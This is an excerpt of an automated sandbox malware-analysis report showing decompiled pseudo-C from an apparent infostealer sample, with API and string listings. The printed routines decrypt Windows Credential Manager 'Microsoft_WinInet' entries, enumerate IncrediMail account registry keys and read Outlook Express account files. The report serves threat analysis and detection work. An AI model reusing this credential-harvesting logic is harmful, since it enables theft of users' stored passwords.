				if(_t92 > 0) {
					_t45 = _t88 - 0x415;
					__eflags = _t45;
					if(_t45 == 0) {
						E0040A4C8(__ecx);
						L22:
						__eflags = 0;
						E0040A27F(0, _t84, _t91, 0);
						L23:
						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
							_t81 = _a12;
							_t86 =  *(_a12 + 0xc);
							_t50 =  *((intOrPtr*)(_t91 + 0x370));
							if((_t86 & 0x00000008) == 0) {
								__eflags = _t86 & 0x00000040;
								if((_t86 & 0x00000040) != 0) {
									 *0x4171ac =  *0x4171ac & 0x00000000;
									__eflags =  *0x4171ac;
									SetFocus( *(_t50 + 0x184));
								}
							} else {
								E00409D7E(_t50, _t81);
							}
						}
						return E004019AC(_t91, _t88, _a8, _a12);
					}
					_t53 = _t45 - 1;
					__eflags = _t53;
					if(_t53 == 0) {
						E0040A56C(__ecx);
						goto L22;
					}
					__eflags = _t53 == 6;
					if(_t53 == 6) {
						SetFocus( *(__ecx + 0x378));
					}
					goto L23;
				}
				if(_t92 == 0) {
					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
					E0040A437(__ecx);
					goto L22;
				}
				if(_t88 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
					} else {
						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
					}
					goto L23;
				}
				if(_t88 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L23;
					}
					SetCursor(LoadCursorA( *0x416b94, 0x67));
					return 1;
				}
				if(_t88 == 0x2b) {
					_t82 = _a12;
					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t82 + 0x18), 1);
						SetTextColor( *(_t82 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t90 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
						SelectObject( *(_t90 + 0x18), _v8);
						_t88 = _a4;
					}
				} else {
					if(_t88 == 0x7b) {
						_t87 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
							E0040B372(__ecx, _t87);
						}
					}
				}
				goto L23;
			}


















                                                                                                                                                    0x0040b53c
                                                                                                                                                    0x0040b545
                                                                                                                                                    0x0040b54d
                                                                                                                                                    0x0040b54f
                                                                                                                                                    0x0040b551
                                                                                                                                                    0x0040b689
                                                                                                                                                    0x0040b689
                                                                                                                                                    0x0040b68e
                                                                                                                                                    0x0040b6b1
                                                                                                                                                    0x0040b6b6
                                                                                                                                                    0x0040b6b6
                                                                                                                                                    0x0040b6b8
                                                                                                                                                    0x0040b6bd
                                                                                                                                                    0x0040b6c3
                                                                                                                                                    0x0040b6c5
                                                                                                                                                    0x0040b6c8
                                                                                                                                                    0x0040b6ce
                                                                                                                                                    0x0040b6d4
                                                                                                                                                    0x0040b6dd
                                                                                                                                                    0x0040b6e0
                                                                                                                                                    0x0040b6e8
                                                                                                                                                    0x0040b6e8
                                                                                                                                                    0x0040b6ef
                                                                                                                                                    0x0040b6ef
                                                                                                                                                    0x0040b6d6
                                                                                                                                                    0x0040b6d6
                                                                                                                                                    0x0040b6d6
                                                                                                                                                    0x0040b6d4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b6fe
                                                                                                                                                    0x0040b690
                                                                                                                                                    0x0040b690
                                                                                                                                                    0x0040b691
                                                                                                                                                    0x0040b6a8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b6a8
                                                                                                                                                    0x0040b693
                                                                                                                                                    0x0040b696
                                                                                                                                                    0x0040b69e
                                                                                                                                                    0x0040b69e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b696
                                                                                                                                                    0x0040b557
                                                                                                                                                    0x0040b679
                                                                                                                                                    0x0040b680
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b680
                                                                                                                                                    0x0040b560
                                                                                                                                                    0x0040b651
                                                                                                                                                    0x0040b654
                                                                                                                                                    0x0040b671
                                                                                                                                                    0x0040b656
                                                                                                                                                    0x0040b663
                                                                                                                                                    0x0040b663
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b654
                                                                                                                                                    0x0040b569
                                                                                                                                                    0x0040b626
                                                                                                                                                    0x0040b62c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b641
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b649
                                                                                                                                                    0x0040b572
                                                                                                                                                    0x0040b59e
                                                                                                                                                    0x0040b5a4
                                                                                                                                                    0x0040b5aa
                                                                                                                                                    0x0040b5b5
                                                                                                                                                    0x0040b5c3
                                                                                                                                                    0x0040b5da
                                                                                                                                                    0x0040b5e2
                                                                                                                                                    0x0040b5e3
                                                                                                                                                    0x0040b5e4
                                                                                                                                                    0x0040b5e5
                                                                                                                                                    0x0040b5e6
                                                                                                                                                    0x0040b5ff
                                                                                                                                                    0x0040b606
                                                                                                                                                    0x0040b60d
                                                                                                                                                    0x0040b619
                                                                                                                                                    0x0040b61b
                                                                                                                                                    0x0040b61b
                                                                                                                                                    0x0040b574
                                                                                                                                                    0x0040b577
                                                                                                                                                    0x0040b583
                                                                                                                                                    0x0040b58c
                                                                                                                                                    0x0040b594
                                                                                                                                                    0x0040b594
                                                                                                                                                    0x0040b58c
                                                                                                                                                    0x0040b577
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                                                                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                                                                                                                    • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                                                                                                                      • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                                                                                                                      • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                                                                                                                      • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                                                                                                                    • LoadCursorA.USER32 ref: 0040B63A
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040B641
                                                                                                                                                    • PostMessageA.USER32 ref: 0040B663
                                                                                                                                                    • SetFocus.USER32(?), ref: 0040B69E
                                                                                                                                                    • SetFocus.USER32(?), ref: 0040B6EF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1416211542-0
                                                                                                                                                    • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                                                                                    • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                                                                                                                    • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                                                                                    • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405FC6 Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00405FC6(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t14;
				void* _t29;
				void* _t34;
				long _t36;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t14 = E00405ECB(_a4);
				_v12 = _t14;
				if(_t14 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t36 = GetFileSize(_t14, 0);
					_t5 = _t36 + 1; // 0x1
					_t29 = GlobalAlloc(0x2000, _t5);
					if(_t29 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t34 = GlobalLock(_t29);
						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t34 + _t36)) = 0;
							GlobalUnlock(_t29);
							SetClipboardData(1, _t29);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}










                                                                                                                                                    0x00405fcc
                                                                                                                                                    0x00405fd0
                                                                                                                                                    0x00405fd9
                                                                                                                                                    0x00405fe2
                                                                                                                                                    0x00405fe5
                                                                                                                                                    0x0040605b
                                                                                                                                                    0x00405fe7
                                                                                                                                                    0x00405ff3
                                                                                                                                                    0x00405ff5
                                                                                                                                                    0x00406004
                                                                                                                                                    0x00406008
                                                                                                                                                    0x0040603e
                                                                                                                                                    0x00406044
                                                                                                                                                    0x0040600a
                                                                                                                                                    0x00406013
                                                                                                                                                    0x00406026
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406028
                                                                                                                                                    0x00406029
                                                                                                                                                    0x0040602d
                                                                                                                                                    0x00406036
                                                                                                                                                    0x00406036
                                                                                                                                                    0x00406026
                                                                                                                                                    0x0040604a
                                                                                                                                                    0x00406052
                                                                                                                                                    0x0040605e
                                                                                                                                                    0x00406068

                                                                                                                                                    APIs
                                                                                                                                                    • EmptyClipboard.USER32 ref: 00405FD0
                                                                                                                                                      • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 0040600B
                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040602D
                                                                                                                                                    • SetClipboardData.USER32 ref: 00406036
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040603E
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040604A
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00406055
                                                                                                                                                    • CloseClipboard.USER32 ref: 0040605E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                    • Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                                                                                    • Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
                                                                                                                                                    • Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                                                                                    • Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EDDB Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy
                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                    • API String ID: 3177657795-318151290
                                                                                                                                                    • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                                                                                    • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                                                                                                                    • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                                                                                    • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040765B Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 152COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                    			E0040765B(void* __eflags, intOrPtr* _a4) {
				char _v532;
				short _v534;
				void _v1042;
				void _v1044;
				long _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1096;
				int _v1104;
				char _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				long* _v1136;
				wchar_t* _v1140;
				wchar_t* _v1144;
				intOrPtr _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				void* _v1164;
				void* _v1168;
				int _v1172;
				intOrPtr _v1176;
				char _v1180;
				char _v1184;
				signed int _v1188;
				void* __edi;
				void* __esi;
				void* _t76;
				int _t83;
				wchar_t* _t109;
				wchar_t* _t110;
				signed int _t120;
				int _t126;
				void* _t129;
				intOrPtr _t134;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
				_push(_t129);
				_v1108 = 0;
				_v1104 = 0;
				if(E00404647( &_v1108, _t129, __eflags) != 0) {
					_v1184 = 0;
					_v1180 = 0;
					if(_v1088 == 0) {
						_t76 = 0;
						__eflags = 0;
					} else {
						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
					}
					if(_t76 != 0) {
						_t120 = 9;
						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
						_t143 = _t142 + 0xc;
						_v1172 = wcslen( &_v1080);
						_v1176 = 1;
						_v1188 = 0;
						if(_v1180 > 0) {
							while(_v1176 != 0) {
								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
								_t143 = _t143 + 0xc;
								if(_t83 == 0) {
									do {
										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
										 *(_t83 + 0x417968) =  *_t25 << 2;
										_t83 = _t83 + 2;
										_t152 = _t83 - 0x4a;
									} while (_t83 < 0x4a);
									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
									_t139 =  &_v532;
									_v1160 = 0x4a;
									_v1156 = 0x417968;
									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
									E004046D7( &_v532);
									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
										_v1044 = 0;
										memset( &_v1042, 0, 0x1fe);
										_t126 = _v1168;
										_t144 = _t143 + 0xc;
										if(_t126 > 0x1fa) {
											_t126 = 0x1fa;
										}
										memcpy( &_v1044, _v1164, _t126);
										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
										_v1124 =  *((intOrPtr*)(_t134 + 4));
										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
										_v1144 =  *(_t134 + 8);
										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
										_t109 =  &_v1044;
										_v534 = 0;
										_v1140 = _t109;
										_v1136 = 0x4125f4;
										_t110 = wcschr(_t109, 0x3a);
										_t143 = _t144 + 0x14;
										if(_t110 != 0) {
											 *_t110 = 0;
											_v1136 =  &(_t110[0]);
										}
										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
										LocalFree(_v1168);
									}
									E004047F1( &_v532);
								}
								_v1188 = _v1188 + 1;
								if(_v1188 < _v1180) {
									continue;
								}
								goto L18;
							}
						}
						L18:
						_v1096(_v1184);
					}
				}
				return E004046C2( &_v1108);
			}















































                                                                                                                                                    0x00407661
                                                                                                                                                    0x0040766b
                                                                                                                                                    0x00407670
                                                                                                                                                    0x00407674
                                                                                                                                                    0x0040767f
                                                                                                                                                    0x00407689
                                                                                                                                                    0x0040768d
                                                                                                                                                    0x00407691
                                                                                                                                                    0x004076a8
                                                                                                                                                    0x004076a8
                                                                                                                                                    0x00407693
                                                                                                                                                    0x0040769f
                                                                                                                                                    0x0040769f
                                                                                                                                                    0x004076ac
                                                                                                                                                    0x004076b4
                                                                                                                                                    0x004076c3
                                                                                                                                                    0x004076c3
                                                                                                                                                    0x004076cf
                                                                                                                                                    0x004076d3
                                                                                                                                                    0x004076db
                                                                                                                                                    0x004076df
                                                                                                                                                    0x004076e5
                                                                                                                                                    0x004076f7
                                                                                                                                                    0x00407709
                                                                                                                                                    0x0040770e
                                                                                                                                                    0x00407713
                                                                                                                                                    0x00407719
                                                                                                                                                    0x00407719
                                                                                                                                                    0x00407724
                                                                                                                                                    0x0040772c
                                                                                                                                                    0x0040772d
                                                                                                                                                    0x0040772d
                                                                                                                                                    0x00407735
                                                                                                                                                    0x0040773c
                                                                                                                                                    0x00407743
                                                                                                                                                    0x0040774b
                                                                                                                                                    0x00407753
                                                                                                                                                    0x00407757
                                                                                                                                                    0x00407763
                                                                                                                                                    0x00407795
                                                                                                                                                    0x0040779d
                                                                                                                                                    0x004077a2
                                                                                                                                                    0x004077ab
                                                                                                                                                    0x004077b0
                                                                                                                                                    0x004077b2
                                                                                                                                                    0x004077b2
                                                                                                                                                    0x004077c1
                                                                                                                                                    0x004077c9
                                                                                                                                                    0x004077d0
                                                                                                                                                    0x004077d7
                                                                                                                                                    0x004077de
                                                                                                                                                    0x004077e5
                                                                                                                                                    0x004077ec
                                                                                                                                                    0x004077f3
                                                                                                                                                    0x004077f7
                                                                                                                                                    0x00407801
                                                                                                                                                    0x00407809
                                                                                                                                                    0x0040780d
                                                                                                                                                    0x00407815
                                                                                                                                                    0x0040781a
                                                                                                                                                    0x0040781f
                                                                                                                                                    0x00407821
                                                                                                                                                    0x00407827
                                                                                                                                                    0x00407827
                                                                                                                                                    0x0040783b
                                                                                                                                                    0x0040783f
                                                                                                                                                    0x0040783f
                                                                                                                                                    0x0040784c
                                                                                                                                                    0x0040784c
                                                                                                                                                    0x00407851
                                                                                                                                                    0x0040785d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040785d
                                                                                                                                                    0x004076e5
                                                                                                                                                    0x00407863
                                                                                                                                                    0x00407867
                                                                                                                                                    0x00407867
                                                                                                                                                    0x004076ac
                                                                                                                                                    0x0040787a

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                                                                                    • wcslen.MSVCRT ref: 004076C5
                                                                                                                                                    • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                                                                                                                    • memset.MSVCRT ref: 0040779D
                                                                                                                                                    • memcpy.MSVCRT ref: 004077C1
                                                                                                                                                    • wcschr.MSVCRT ref: 00407815
                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                                                                                                                      • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                    • String ID: J$Microsoft_WinInet$hyA
                                                                                                                                                    • API String ID: 2413121283-319027496
                                                                                                                                                    • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                                                                                    • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                                                                                                                    • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                                                                                    • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402FC2 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00402FC2(void* __eax, void* __ecx, void* __fp0, void* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				void _v271;
				char _v272;
				void _v527;
				char _v528;
				void _v827;
				char _v828;
				void* __edi;
				void* __esi;
				long _t40;
				void* _t44;
				void* _t55;
				void* _t60;
				void* _t66;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t77;

				_t77 = __fp0;
				_t66 = __ecx;
				_t67 = __eax;
				_t40 = E0040EB3F(_a4, "Software\\IncrediMail\\Identities",  &_a4);
				_t72 = _t71 + 0xc;
				if(_t40 == 0) {
					_v12 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t44 = E0040EC05(_a4, 0,  &_v272);
					_t73 = _t72 + 0x18;
					while(_t44 == 0) {
						E0040EBC1(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
						_v828 = 0;
						memset( &_v827, 0, 0x12b);
						sprintf( &_v828, "%s\\Accounts",  &_v272);
						_t55 = E0040EB3F(_a4,  &_v828,  &_v8);
						_t74 = _t73 + 0x38;
						if(_t55 == 0) {
							_v16 = 0;
							_v528 = 0;
							memset( &_v527, 0, 0xff);
							_t60 = E0040EC05(_v8, 0,  &_v528);
							_t74 = _t74 + 0x18;
							while(_t60 == 0) {
								E00402D9A(_t66, _t67, 0xff, _t77, _v8,  &_v528);
								_v16 = _v16 + 1;
								_t60 = E0040EC05(_v8, _v16,  &_v528);
								_t74 = _t74 + 0xc;
							}
							RegCloseKey(_v8);
						}
						_v12 = _v12 + 1;
						_t44 = E0040EC05(_a4, _v12,  &_v272);
						_t73 = _t74 + 0xc;
					}
					_t40 = RegCloseKey(_a4);
				}
				 *((char*)(_t67 + 0xa9c)) = 0;
				return _t40;
			}

























                                                                                                                                                    0x00402fc2
                                                                                                                                                    0x00402fc2
                                                                                                                                                    0x00402fcd
                                                                                                                                                    0x00402fdb
                                                                                                                                                    0x00402fe0
                                                                                                                                                    0x00402fe7
                                                                                                                                                    0x00402ffc
                                                                                                                                                    0x00402fff
                                                                                                                                                    0x00403005
                                                                                                                                                    0x00403015
                                                                                                                                                    0x0040301a
                                                                                                                                                    0x00403101
                                                                                                                                                    0x0040303a
                                                                                                                                                    0x0040304c
                                                                                                                                                    0x00403052
                                                                                                                                                    0x0040306a
                                                                                                                                                    0x0040307d
                                                                                                                                                    0x00403082
                                                                                                                                                    0x00403087
                                                                                                                                                    0x00403092
                                                                                                                                                    0x00403095
                                                                                                                                                    0x0040309b
                                                                                                                                                    0x004030ab
                                                                                                                                                    0x004030b0
                                                                                                                                                    0x004030dc
                                                                                                                                                    0x004030bf
                                                                                                                                                    0x004030c4
                                                                                                                                                    0x004030d4
                                                                                                                                                    0x004030d9
                                                                                                                                                    0x004030d9
                                                                                                                                                    0x004030e3
                                                                                                                                                    0x004030e3
                                                                                                                                                    0x004030e9
                                                                                                                                                    0x004030f9
                                                                                                                                                    0x004030fe
                                                                                                                                                    0x004030fe
                                                                                                                                                    0x0040310c
                                                                                                                                                    0x00403112
                                                                                                                                                    0x00403113
                                                                                                                                                    0x0040311c

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                    • memset.MSVCRT ref: 00403005
                                                                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                                                                    • memset.MSVCRT ref: 00403052
                                                                                                                                                    • sprintf.MSVCRT ref: 0040306A
                                                                                                                                                    • memset.MSVCRT ref: 0040309B
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004030E3
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040310C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                    • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                    • API String ID: 3672803090-3168940695
                                                                                                                                                    • Opcode ID: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                                                                                                                    • Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
                                                                                                                                                    • Opcode Fuzzy Hash: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                                                                                                                    • Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407A64 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                    			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t39;
				char* _t49;
				void* _t51;
				int _t64;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E004118A0(0x204c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
